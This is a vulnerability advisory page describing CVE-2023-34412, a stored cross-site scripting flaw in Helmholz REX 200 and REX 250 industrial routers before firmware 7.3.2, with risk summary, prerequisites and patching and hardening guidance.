Helmholz: Cross-site Scripting vulnerability in REX 200/REX 250

Monitor4.8VDE-2023-029Aug 17, 2023

Attack VectorNetwork

Auth RequiredHigh

ComplexityLow

User InteractionRequired

Summary

A stored cross-site scripting (XSS) vulnerability exists in Helmholz REX 200 and REX 250 devices in all versions before 7.3.2. An attacker with engineering credentials can inject malicious JavaScript into the device interface, which executes in the browsers of other authorized users who access the same interface pages, enabling session hijacking or unauthorized process control.

What this means

What could happen

An attacker with high-privilege access to REX 200/250 engineering interface could inject malicious code that executes in the browsers of other operators, potentially allowing them to steal sessions, modify process parameters, or redirect operations to unauthorized targets.

Who's at risk

Water utilities and municipal electric operators using Helmholz REX 200 or REX 250 programmable logic controllers (PLCs) or automation devices in versions prior to 7.3.2. This affects any facility using these devices for process control or SCADA integration.

How it could be exploited

An attacker with engineering/administrative credentials stores malicious JavaScript in the REX 200/250 web interface. When other authorized users (e.g., process operators or plant engineers) view the affected pages, the injected code runs in their browser session, granting the attacker the same access level as the victim user.

Prerequisites

Engineering or administrative credentials for REX 200 or REX 250
Ability to navigate to and modify data fields in the web interface
Target operators must access the affected pages in their browser after injection

Remotely exploitable via web interfaceRequires high-privilege credentialsAffects multiple operator sessions

Affected products (2)

2 with fix

ProductAffected VersionsFix Status

REX 200<7.3.27.3.2

REX 250<7.3.27.3.2

Remediation & Mitigation

0/3

Schedule — requires maintenance window

0/1

Patching may require device reboot — plan for process interruption

REX 200

HOTFIXUpdate REX 200 and REX 250 to firmware version 7.3.2 or later

Long-term hardening

0/2

REX 200

HARDENINGRestrict access to the REX 200/250 engineering interface to trusted internal networks and require VPN for remote access

All products

HARDENINGImplement account lockout or monitoring for failed login attempts to detect credential compromise attempts

CVEs (1)

CVE-2023-34412

View full CERT@VDE advisory

↑↓ Navigate · Esc Close

API: /api/v1/advisories/6aa15409-f6e6-4d2f-8708-43cf32e9e704